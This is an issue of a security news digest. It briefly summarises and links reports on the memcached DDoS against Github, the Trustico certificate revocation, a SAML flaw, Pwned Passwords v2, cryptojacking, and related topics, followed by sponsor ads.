Issue 66

 

New record DDoS attack through memcached-based amplification

The target was Github, who mitigated the 1.3Tbs attack with the help of Akamai.
Memcached-based amplification attacks aren't a new idea, but it seems to have been picked up and weaponised. With it an in incoming packet can be amplified about 50,000 times, making a request of 203 bytes come out to a 100 megabyte response.
wired.com

 

23,000 users lose SSL certificates in Trustico-DigiCert fight

From what I can make out: Trustico, an SSL reseller, wanted to mass-revoke 50.000 of their certificates, issued through Symantec. Digicert, who bought the Symantec SSL business, said they could only do that if these certificates were compromised. Then Trustico e-mailed them the private keys of 23,000 certificates, which they never should have had in the first place, hence compromising them openly and triggering revocation. More details in the article.
bleepingcomputer.com

 

SAML vulnerability through inconsistent comment handling

Researchers from Duo have discovered an attack where one can change how a username is read without invalidating the request. Effectively giving someone on the same SSO server the ability to identify as someone else.
sophos.com

 

Troy Hunt launches v2 of "Pwned Passwords"

It's a service that makes it possible to tell your users that their password has been seen in a breach before, and hence will probably be in any hacker's dictionary attack. It explains thoroughly how he ensures privacy and how the service is built.
troyhunt.com

 

Using ever-changing domain names to bypass ad blockers and deploy in-browser miners

Researchers have described a malicious ad network that bypasses ad blockers by continuously computing new domain names where the ads and miners are hosted, so that ad blockers can't keep up with their blacklists. DGA, as that technique is called, is usually seen in malware.
bleepingcomputer.com

 

‘In Fraud We Trust’ – Cybercrime arrests shows we’re fighting pros

The article details the inner workings of Infraud, a well organised marketplace for stolen identities and the likes, similar to Silk Road. A total of 36 people are indicted, of which only 13 have been arrested so far.
sophos.com

 

CSS can be abused to collect sensitive user data

Though not a new technique in itself, data exfiltration through CSS selectors has gotten some new attention lately. This article goes through the findings.
bleepingcomputer.com

 

How to find cryptojacking malware

Interesting blogpost by a researcher on how to find instances of cryptojacking. Coinhive alone seems to be present on over 34.000 sites, with various similar services taking a much smaller slice.
badpackets.net

 

Curated list of awesome threat intelligence resources

Amazing list of threat intelligence resources: IP blacklists and whitelists, firewall rules, threat sharing formats and threat-related reading material.
github.com

 

Sponsorship

 

Bypassing web application firewalls

WAFs are a good security measure but the security of your web applications should not solely depend on it. Watch this demo on Paul’s Security Weekly during which a researcher from Netsparker explains and demos how modern web application firewalls can be bypassed.
netsparker.com

 

Securing your company Macs

Fleetsmith is a fantastic solution for keeping your macOS devices managed and secure, used by yours truly every day. It fully integrates with G Suite, and you can try it free with 10 devices for as long as you need.
fleetsmith.com